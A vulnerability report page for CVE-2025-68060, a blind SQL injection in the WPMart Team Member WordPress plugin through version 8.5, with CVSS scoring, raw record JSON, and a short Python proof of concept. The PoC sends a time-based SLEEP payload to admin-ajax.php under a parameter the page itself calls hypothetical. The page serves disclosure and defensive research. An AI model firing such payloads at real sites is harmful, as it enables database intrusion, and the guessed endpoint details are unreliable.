Security Vulnerability Report
中文
CVE-2025-68060 CVSS 7.6 HIGH

CVE-2025-68060

Published: 2026-05-07 09:16:27
Last Modified: 2026-05-07 14:00:49

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPMart Team Member allows Blind SQL Injection. This issue affects Team Member: from n/a through 8.5.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

WPMart Team Member <= 8.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for Blind SQL Injection in WPMart Team Member # Requires authentication (High Privileges) import requests target_url = "http://example.com/wp-admin/admin-ajax.php" # Payload to test timing based blind injection payload = "1' AND SLEEP(5)-- -" # Authentication cookies (High Privilege required) cookies = { "wordpress_logged_in_xxx": "admin_session_token_here" } # Hypothetical vulnerable parameter data = { "action": "team_member_action", "member_id": payload } try: response = requests.post(target_url, data=data, cookies=cookies, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerable to Blind SQL Injection") else: print("[-] Not vulnerable or payload incorrect") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68060", "sourceIdentifier": "[email protected]", "published": "2026-05-07T09:16:26.640", "lastModified": "2026-05-07T14:00:48.567", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPMart Team Member allows Blind SQL Injection.\n\nThis issue affects Team Member: from n/a through 8.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/team-showcase-supreme/vulnerability/wordpress-team-member-plugin-8-5-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}